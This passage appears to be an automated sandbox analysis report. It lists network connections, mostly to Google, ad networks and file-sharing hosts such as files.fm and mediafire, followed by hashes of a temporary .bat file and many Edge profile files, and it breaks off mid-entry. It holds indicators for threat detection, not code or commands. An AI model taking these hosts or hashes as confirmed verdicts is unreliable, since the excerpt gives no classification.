| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| GB | 216.58.204.67:443 | www.google.co.uk | tcp |
| GB | 216.58.204.67:443 | www.google.co.uk | tcp |
| US | 8.8.8.8:53 | translate-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | custom-gwent.com | udp |
| FR | 51.75.26.147:80 | custom-gwent.com | tcp |
| FR | 51.75.26.147:80 | custom-gwent.com | tcp |
| FR | 51.75.26.147:443 | custom-gwent.com | tcp |
| US | 8.8.8.8:53 | 147.26.75.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | the.gatekeeperconsent.com | udp |
| US | 104.21.42.32:443 | the.gatekeeperconsent.com | tcp |
| US | 8.8.8.8:53 | 32.42.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr4---sn-q4fzene7.googlevideo.com | udp |
| US | 173.194.141.169:443 | rr4---sn-q4fzene7.googlevideo.com | udp |
| US | 8.8.8.8:53 | 169.141.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 104.22.74.216:443 | btloader.com | tcp |
| US | 8.8.8.8:53 | download2288.mediafire.com | udp |
| US | 8.8.8.8:53 | www.ezojs.com | udp |
| US | 172.64.129.8:80 | www.ezojs.com | tcp |
| US | 8.8.8.8:53 | privacy.gatekeeperconsent.com | udp |
| US | 104.21.42.32:443 | privacy.gatekeeperconsent.com | tcp |
| US | 8.8.8.8:53 | 216.74.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.178.17.96.in-addr.arpa | udp |
| GB | 172.217.16.238:443 | translate.google.com | udp |
| US | 8.8.8.8:53 | files.fm | udp |
| US | 8.8.8.8:53 | 8.129.64.172.in-addr.arpa | udp |
| US | 172.67.156.53:443 | files.fm | tcp |
| US | 172.67.156.53:443 | files.fm | tcp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| FR | 15.188.219.54:80 | g.ezoic.net | tcp |
| US | 172.67.156.53:443 | files.fm | tcp |
| BE | 66.102.1.154:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.lv | udp |
| GB | 172.217.169.34:443 | googleads.g.doubleclick.net | tcp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| GB | 216.58.212.195:443 | www.google.lv | tcp |
| US | 8.8.8.8:53 | 53.156.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.23.211.130.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.219.188.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.otnolatrnup.com | udp |
| US | 104.19.214.37:443 | cdn.otnolatrnup.com | tcp |
| US | 8.8.8.8:53 | analytics.files.fm | udp |
| LV | 159.148.57.60:443 | analytics.files.fm | tcp |
| US | 8.8.8.8:53 | 37.214.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.57.148.159.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 172.67.69.19:443 | ad-delivery.net | tcp |
| US | 8.8.8.8:53 | rr2---sn-4g5lznl7.googlevideo.com | udp |
| DE | 74.125.163.167:443 | rr2---sn-4g5lznl7.googlevideo.com | udp |
| US | 8.8.8.8:53 | 19.69.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.163.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | go.ezodn.com | udp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| US | 172.64.136.15:80 | go.ezodn.com | tcp |
| US | 172.64.136.15:80 | go.ezodn.com | tcp |
| US | 8.8.8.8:53 | g.ezodn.com | udp |
| US | 172.64.137.15:443 | g.ezodn.com | tcp |
| US | 8.8.8.8:53 | rr2---sn-4g5ednsk.googlevideo.com | udp |
| DE | 173.194.188.231:443 | rr2---sn-4g5ednsk.googlevideo.com | udp |
| US | 8.8.8.8:53 | 15.136.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.137.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.188.194.173.in-addr.arpa | udp |
| FR | 15.188.219.54:80 | g.ezoic.net | tcp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| GB | 172.217.169.34:80 | securepubads.g.doubleclick.net | tcp |
| GB | 172.217.169.34:443 | securepubads.g.doubleclick.net | tcp |
| US | 172.64.136.15:80 | g.ezodn.com | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| GB | 142.250.187.238:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr4---sn-q4fl6nsr.googlevideo.com | udp |
| US | 172.217.131.201:443 | rr4---sn-q4fl6nsr.googlevideo.com | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| GB | 96.16.109.9:443 | ads.pubmatic.com | tcp |
| LV | 159.148.57.60:443 | analytics.files.fm | tcp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | 201.131.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.109.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | yt3.ggpht.com | udp |
| GB | 172.217.16.225:443 | yt3.ggpht.com | tcp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| GB | 216.58.204.67:443 | www.google.co.uk | udp |
| GB | 172.217.169.34:443 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | ut.pubmatic.com | udp |
| GB | 142.250.187.202:443 | translate-pa.googleapis.com | udp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| NL | 185.64.189.226:443 | ut.pubmatic.com | tcp |
| US | 8.8.8.8:53 | bshr.ezodn.com | udp |
| US | 172.64.136.15:443 | bshr.ezodn.com | tcp |
| US | 8.8.8.8:53 | otnolatrnup.com | udp |
| US | 8.8.8.8:53 | 229.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.20.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| GB | 18.165.201.18:443 | tags.crwdcntrl.net | tcp |
| US | 8.8.8.8:53 | ad.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| IE | 34.246.36.174:443 | bcp.crwdcntrl.net | tcp |
| IE | 52.211.99.1:443 | bcp.crwdcntrl.net | tcp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 172.217.16.238:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | 18.201.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.36.246.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.99.211.52.in-addr.arpa | udp |
| FR | 15.188.219.54:80 | g.ezoic.net | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| GB | 142.250.179.238:443 | www.youtube.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\DCCE.tmp\DCCF.tmp\DCD0.bat
| MD5 | 6882363dd125a39e084667ddd43532a4 |
| SHA1 | a5b6e74b292d96424d7b39ee9f71e98701f4548d |
| SHA256 | b998f488ff63337265c33a7e298e85679393d54e6094d223cd97e549a17078ba |
| SHA512 | 7bec550ded2c532f279638050638db8abe48f7a31f1175a8caf34dd6ff4ccddfc01331211088ab0b2e3fe980846657f609a897be88eace28c0347f56d7b91a19 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 1e3dc6a82a2cb341f7c9feeaf53f466f |
| SHA1 | 915decb72e1f86e14114f14ac9bfd9ba198fdfce |
| SHA256 | a56135007f4dadf6606bc237cb75ff5ff77326ba093dff30d6881ce9a04a114c |
| SHA512 | 0a5223e8cecce77613b1c02535c79b3795e5ad89fc0a934e9795e488712e02b527413109ad1f94bbd4eb35dd07b86dd6e9f4b57d4d7c8a0a57ec3f7f76c7890a |
\??\pipe\LOCAL\crashpad_740_ASNHTARLTNPOXQGP
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 36bb45cb1262fcfcab1e3e7960784eaa |
| SHA1 | ab0e15841b027632c9e1b0a47d3dec42162fc637 |
| SHA256 | 7c6b0de6f9b4c3ca1f5d6af23c3380f849825af00b58420b76c72b62cfae44ae |
| SHA512 | 02c54c919f8cf3fc28f5f965fe1755955636d7d89b5f0504a02fcd9d94de8c50e046c7c2d6cf349fabde03b0fbbcc61df6e9968f2af237106bf7edd697e07456 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0ad4ee0141cde3619577aa6284373e4a |
| SHA1 | 3ab357a94fcd0082917967933debe1092c720795 |
| SHA256 | 357eeac43f451f41c9f7bc271567bcc85a197571c3dd60025615a37f7425e25a |
| SHA512 | 92cbaf0b484dcccae03d44b23200386fdebbb477fd4acfb09f34989efcb369f2510637e1b4dad46b129e196d9722bba2819806f8f3ad578d4d484e62fcf871bf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 62d58388cee158390aee2e922ad8fc8a |
| SHA1 | d828fa3b27eb6eccaa4bed8a32262a73057631c0 |
| SHA256 | b56934f2d515f1a4632841927ef435ae4b78ee332836f1e15b6b954fc63fbbb8 |
| SHA512 | a972634aff9a658b6e64052c77e27c6f37b1b7de03023ec96ee898993f05127f8a46fe06d44988d26f4967957f431140a68a923be14df8df97b17695731d890f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
| MD5 | 838a7b32aefb618130392bc7d006aa2e |
| SHA1 | 5159e0f18c9e68f0e75e2239875aa994847b8290 |
| SHA256 | ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa |
| SHA512 | 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13353885193125083
| MD5 | 128b53fc2d526f2d1ee7ce4a11bd907d |
| SHA1 | da497f43cbc0f7bceb94187a8c37775343038ee5 |
| SHA256 | 69353cf31c9d5406374f5c60e45ccaff091acd558a5ecd4462371955aa208524 |
| SHA512 | 439f48eb1554e15d50fe092c796425815107fa2557efe5bf38f86ada228694e1e95d46f846ff12c923d799d328a137d562bf25de168f44ef5041df306c0221e4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13353885193925083
| MD5 | 46e511ee32bfa006164e2cd10f354868 |
| SHA1 | f3126d58922abff380516179801dc9083e0106c7 |
| SHA256 | 2721c4f40399439d4e8db2fd6f07571776708f8e0ab046b75ec293a788515743 |
| SHA512 | f691ef22f3a2d0e4060430a7bbf0de9999fd5e1f8c01378493c0fb72a55bf276fe9c066c7240fbe134391db124955be3f3fd687d6a53af1d68abc0bf017988cc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG
| MD5 | 9c5defa4ccef814d628965bc1a843520 |
| SHA1 | 2cb58a38b9a27721871bad1c4148eedc303488ae |
| SHA256 | 372e3744093f5a4f2016c0bdd39264339c1b73fad9f2fbd83c0b183b0c8b271e |
| SHA512 | fb9286d2f0a7b0ea5b861224253d3cc74486268fbe2d258221b459f8a88dfb6e7a5f1cec033a3dbaa88f8e7ec4609a03a7ed8a6cc735a668fd902c08e72a26aa |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG
| MD5 | 6c541c15bacd30cd67b91dd1745ea809 |
| SHA1 | f0e6a8ebcb7a1f13644317c46dbf7560ba0318ab |
| SHA256 | 05cf5d29bd984d6a8180b6bba8327bab19d6c711709f52d7215b99389ad894ed |
| SHA512 | 57254dc2f40b0c16120ff6c011fb34fc555589f5a9116e2711f36f04b9c4d9e8165c35792a360a617e911f22dcaca9d6ee6c16a0adec412e76f61feb87c1d237 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal
| MD5 | c267930c2a88e164828dd8d0a4933c74 |
| SHA1 | d18af9909cfb44ee3ad7557b9c90fb683966ec92 |
| SHA256 | 54a2c37ecfa57973eb82ef0a28f29fdad1771e2768429d77701839a4d1c927bb |
| SHA512 | 3a014d44a828e193c6d9920e7bd6a46693c966f612890f2d28411b341ea02a7dac6fe3a80ade64fa861661c751fb2f29ef611c689e21baa59725a3c2c50a6693 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG
| MD5 | b2b065ca79fdd521c559229ff45fea9b |
| SHA1 | fa9678dfe7244f7f641c7acdfc49552bc40bbc29 |
| SHA256 | 29b40f3f708febb5a8bbf7b121471f072267ea1d3c06406986f812201be1608c |
| SHA512 | c12f8ee23c11a8143a41aaebc0bd6567d880f2d3aaa862cf8a4edee3c6a259cd1ad4f912816ba59948cdd950cf1c9e17fea86911a238d0e238be60a94609365c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG
| MD5 | 876470cfd40f2d195f3ca46cec51f87a |
| SHA1 | f3ce7cf41a4ba2da291024410ccd26424a7cb4c2 |
| SHA256 | e76b4d97171602f28448cac0cb619b85734d2b1cb89fb6297caf594675e43e42 |
| SHA512 | ae24bebdbd6e2dace8c5a7622e63d865fab181067337de5750f2d0c30ed184595d1a3507283f87061455394670179464347ab7581efe696ff2b69d5a3513e8a5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG
| MD5 | 1132832de7574d1b208ca6c6a195f005 |
| SHA1 | e37577d3ccd1894efb3cbd0145d47ca786180cd0 |
| SHA256 | 044c3b77503ab1d9fc5f1aee98122ef8a3b6c8998eff9b16b66d3315de00a03b |
| SHA512 | 7e8537607b77c0cb530ab6e9fd9f69ed22944de864e37c508083be430e446b8407b7b0b19d91b52da51247d3110b7ed59c997fb307e97030d84f510016de05e0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log
| MD5 | dbb805a0ebd21bca3d0aa93ccd995326 |
| SHA1 | d839471308547b9fba1fdb2d4d9a120df099367b |
| SHA256 | 218e73d1cc5296bbf8382d9951d4ce0740edb39dee874b2b93e1e3c34115440d |
| SHA512 | 878fffc094ed461d24088ec641c317044cbd25deb24dc19d2c24d5d90104819c1c45e9d65aee4a188969ecd4ff98a20b93db13e877e024079cc5e8016a4ba879 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG
| MD5 | bf1e418bd0ce3722fdf6e3a34b263e74 |
| SHA1 | cc3e0531ea8fd5269185efd08c92d33ff7a26693 |
| SHA256 | b71f79d52c61e0fd894972f6adc5c5893279b4828f84149f812fdbc5e606d106 |
| SHA512 | 4b7843d923b03d9e5a747abcbaaada3e8b439c74f1b24cbd2a8f1fd1d0377dc140de94f92cf201021d2526b448db795f2950d3a34514c23cb59b52522e2543c5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG
| MD5 | 344322223f0ccbea61c08a44531f4c54 |
| SHA1 | d06a1eb002f866f7dde8f71c59bddd7f4e0e7457 |
| SHA256 | c940a6018885a426226df13b481fd6b00c69a1656e53412c0743d5897d5155af |
| SHA512 | e9f3d2dafd6d67e9e32e41e3c86023e631e25734cfdd7f37a035d599855071649a582084f54445d9cbc1d28eb667929cfa0123e4b477de9443a5a1cc096fe9b0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0
| MD5 | 63bc86f6c3cc14787ff8a9116e61ce96 |
| SHA1 | 9ac37467054f19ce291a79ac21e0099d018c23dc |
| SHA256 | a340ef5e6a6225531ad4ac2eabb6eaa434bcf0ef6aab77620a8fc19ac27ab80d |
| SHA512 | 4fbd5410f19803b42d9bff49389ff6a63baba4668bbf7e6ea9f5805655004a5a18c57035475e09c91ee5f07bc1ba57b61a1ed44a3c732c93d0db5eca083a8f1e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1
| MD5 | 279457fbbb30ce4ddb3ff96b593e0828 |
| SHA1 | 8fadee49ac3fdcc21877c8178113f7f3295fad46 |
| SHA256 | 6a0df2302baf411612dbeddf4d710cb435b917ad4dc43bddd4b0cf174371fa0a |
| SHA512 | 8990aaae9040841aa4e4179eb22161735a2e7d52000a522630c9bdd50c5b2bd0ac0b95d5ec52d052d9518aa7f74a681c4676d9f662086c6520d336ad3d029219 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log
| MD5 | fa1af62bdaf3c63591454d2631d5dd6d |
| SHA1 | 14fc1fc51a9b7ccab8f04c45d84442ed02eb9466 |
| SHA256 | 00dd3c8077c2cca17ea9b94804490326ae6f43e6070d06b1516dfd5c4736d94d |
| SHA512 | 2c3184f563b9a9bff088114f0547f204ee1e0b864115366c86506215f42d7dbf161bc2534ccaee783e62cc01105edffc5f5dabf229da5ebd839c96af1d45de77 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 4952d02b0f2608b6a21a49bc6706078e |
| SHA1 | b5a30eaabadca9db2b3596e32b1c0757365db5b6 |
| SHA256 | 0d181f741156c97c5ca830e4cd2d58f3398f0ab0641fcb261dc85903634ecd97 |
| SHA512 | d56dfd91ff17f7d15991a193637889a5ec1f3995baac2bca3198fa87dd2ed760214cf26ec0e58a3103889f096c6a97b198a092578db633a6dcd39e33585d1660 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 6df850440499bf47a8cc3c848c08603c |
| SHA1 | 2b8a8c14381241291eac45302cb3766909f3b532 |
| SHA256 | 1de550200649e2dad5ac2ac6b802346cabd2722f65609a9fb34564939f02039b |
| SHA512 | b236244a2ff0bcf8d935dc479366be51f929b62c97ea2ff4603158815ade1e94b296ec7fe90ca846348a0cea653f96995a75bbc08c4b1ca867066d46a644162d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | d252e1947b4f4d720670732a258e1ec8 |
| SHA1 | 6978bec1c8b52fc5278f2a8ae01680bd32dd1986 |
| SHA256 | 50a4117814481e837669f6849c82d9bafbef3b5691e91b0ba45648f5c8a28ffe |
| SHA512 | 88f0089c564af7a20c8dc6ce3b4179d798366f8037e9614fd954f1e96998140b44b021c4d8c13f6a2e74fdd30b8b7952927789d3478e364c21dbfe258bad682e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 6954ed3e0e649263e016f545ad96c151 |
| SHA1 | 727e1102dcd1d69eb8a7ea6749cf2559fb075883 |
| SHA256 | 3b3407f9292fc28f38936ad6f0b1f4b61117f419396b93e35bcc457a29d478ff |
| SHA512 | 2cb46c047c53d79f5d664b5ce8aa94a8a9c5bc1c067f52674384af53b4280972622bb34c13c05338ef71705e12accda223616ba0e7d12e4b5194e4abc2ea39fd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | a14ba0942c5250220f964a0e9714e60f |
| SHA1 | c1dbb75e0322be720fcc23814d9a6741b175efae |
| SHA256 | ad3650a0da82ce7b464f1989813aecb0554510189a12d5877a6d320406225395 |
| SHA512 | f742f856c4869030eec126c251f277f2a4b8379ee696fd4dd3e5f2aa44fb175a1af97fcc67835bfa6c01b31993e272ef911aa201fee501f3bdcd795f4cf697c6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe599e2a.TMP
| MD5 | eb95a62aa0fb04a2547cf0767a83281b |
| SHA1 | b8c0213e98d3070471bd30a87bf8c875274171c4 |
| SHA256 | a2087dedf94004deccc8998854370ecf3b1c92acc40f4d573a4cba6312c45ffb |
| SHA512 | b841b12965f9bc2b7cdfa56b564fabc82d3101eff88ef9ed992272169e51402889968369d151e3f37d2235a37ff6e4f6968fabed5d03f1b0a7a9d3a88b7ee374 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0e42477e017971631e1a4d1e30220acf |
| SHA1 | 92e8a1ba2d60ace44462a14214f9ca5bd8cf2dc3 |
| SHA256 | 0b78dc0b45f126cea6a5e0dfc1b1c98c9cdbc966a505d3ca00f10ff1db1ad661 |
| SHA512 | e856fe50792158df4e6fe7abc66b62ebd377666aa31fbba5514457d3c943a177f706dfa58ab9ae71e89aa1adc0a44a57f9446fdd33a792c8799933cbfde6ea56 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | c6386f384fab12bdac9346dd2873f5eb |
| SHA1 | be6462efd752a0acae54b66ac5769989c1631f8d |
| SHA256 | a22ca15295fdb399034363bdd7ec8e5c53a3b6b5c4549c36089d24e46598a167 |
| SHA512 | 29ec4a8a455075327fbcf429c712907f8e48915ac7dde665772912a81b96e215b5d11273133d1b9433a9121190685b097277266467bebf72fe875c1f323e592e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002
| MD5 | 8de2c3401fef13f5c0f8e82a2fb76354 |
| SHA1 | f208974c5f866e071c838d0407a6a72d2d1ef1e9 |
| SHA256 | 3fa1c740fe39c7ac18b90935c9d64505c77ab4b95256356ffaf9c0cdee5f7643 |
| SHA512 | ce357e11fbb1ddfd15be9d2534e392799b94af0c2ce614980e3c9124e4267857989662ed2b7e46e0697d0d3ee222e259f66f5a03d0f321152cb5622f5a8bae5b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ff877407df56b9eaa5e1f4467f98b577 |
| SHA1 | a641170824630cdd1aec3c3f7578ecc424ccc197 |
| SHA256 | 447cb613bb78b3d8c0c84de5204211dcf3d8fa130660d947c6bbbbdf02f121fb |
| SHA512 | c484dd823c32f5f17753126cd34b0592ca0d4bd3e4bd320af93b8cb9b152e0b52e2fb5ad69455889e1930a18a2d19a343baa6240838389a03adcd4165d463cc6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | cced56344c314d98b862423129163c84 |
| SHA1 | 158732882eece8038df49d5ad978b0c2dfba3fe8 |
| SHA256 | cc929ec822b863b9a5521a2f55d05203f2587271c450f2ee6c79bd6e967078d3 |
| SHA512 | 52174bc0345fedc3cb66b0ab007eb7e1610b41fa8ce8e27cc4323993a59deb6fb7bafc965e0992a834639d5a4d99dfff75891afc3afbe4f448c1e239b766bff2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | d37bd45c3ab706cb265b3ccd520bad52 |
| SHA1 | d70b937ac2db8cf93d1a0db398025f61891253c2 |
| SHA256 | a2c316c4407ee15c02e9f612ad2aaeb0e9615c3d7a02344be32aff5c7a4fb8d4 |
| SHA512 | 2f54db9342e1a1fe28c2796480349c81acb122eae041f6f660e8c4797d5230358b9e733ab66f354e8569b554e06779cac91e4ccc2d00880e525df24644094021 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe59d45d.TMP
| MD5 | d69c7037eef887eabaa5cd057a9894fa |
| SHA1 | 94cdc8618dc2ac278c8ef2b87a533575439fbd28 |
| SHA256 | c5174c96793851e68591b9167b3730938312732a43a9e9529a5e8ac0669809bf |
| SHA512 | c3b2624481e850383513c21dc206470a9bed46a55d66d454fe90e8a5d30ae80584a4db19a087e800af06cddf30a41c670b94a34334829c2ceba72545c6db000c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | afea75e39305cc3569f99265fcb548ba |
| SHA1 | aa0e9ee9bb9ba93a4c2a645b10c2faf1e84dd2e6 |
| SHA256 | e642ac406facc7a2e6a8bfcc87ee6ec787c80ecf7164e0354a3a025d4e606ba8 |
| SHA512 | e92d0daaa762b38da49df560d48e7d7a4175d87ea5af136012e8ffe1c6556c585ec17cd4f902ce0d6197d4ede808ab5037d20732893a84a85e8e2406c00acf36 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001
| MD5 | 7a204d478c8dfe822bf86f9103bbd9b3 |
| SHA1 | 7114b36ea1588d9372d730b2ee5dec7a3aee36d1 |
| SHA256 | d9134e3cf60db564c49cc181251c7308bc568acf060444c443a90c0f464ebfeb |
| SHA512 | f5fb06a9808e9370a5fb3b926ffa27746ca7942eba36a2f63135168218e326abc74195453b9bcd8a045d5870a71b7f250dfc281515c7fa51857410acb316763e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003
| MD5 | dccf12096bb297369451afc6db16a236 |
| SHA1 | 571bc48377a985f63fc7899142a7224e24aa4c8f |
| SHA256 | 7715812d50fd87d35cbcb910abad64fcc94360346e7728011c71820c8bc73a54 |
| SHA512 | d14341f35d251ad4870d686a810feba0c1b802e552c13a050f34af51aa491645d4cad9dc72a8d664a567844d54ff758c09165e41f8cc9c9a03966dbc91efe8c1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004
| MD5 | 00494c10001e5d3506062fe05b3be14b |
| SHA1 | b6863374fbf468a7e7ed8c5c229b6b47e9e158a9 |
| SHA256 | a474b4dbc3de7f01ae792b12f5950955fc94e31fc77c523d1676590b244c2a65 |
| SHA512 | 9f68ffec822ef1bb4c479ff206d65305dc17b498caa5821c9a9da70111bf457eee594894189fa9ea4e50bba50bac876024d3a82349d35ab42adf523870fbbbde |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006
| MD5 | e9fec90d4af8805b11e69a53eb21aca8 |
| SHA1 | e546322eb933862fa653f20fd4bd38bc6c3375a1 |
| SHA256 | e3801b7cfce7b9fc9ad44dc8569bb007c4cd934fdb7b4c3fea8c23a79e4775b6 |
| SHA512 | 9ee5f9f118d869b2f7ae5d30903cc081710a7fb2f3912fef3bc178e6ad9bd3556f227fc6db940def5049f855938ebc4e2d4d855afbeac5b1ef2305642f8a7b95 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007
| MD5 | 1862a084867804c6446e31f801a6ca10 |
| SHA1 | 9f0addd7e5407ad6adc297d83e71864bf5d234ef |
| SHA256 | fddbb692490ae3a98abc3505688261ed1d9de4440367b2b83dfc26237dab2637 |
| SHA512 | 110160df85746bedc1b5c56c9837a0e6850f47b27b18b804077179821932ea5e4317d1e42407304d3b96f9848504f0ca879c02030510f509d6409285aa90d144 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | d632f6c98568d23b5951fc8b30445205 |
| SHA1 | 5de9f2b13b104e2beedfaae0fd87bd6eebd59a28 |
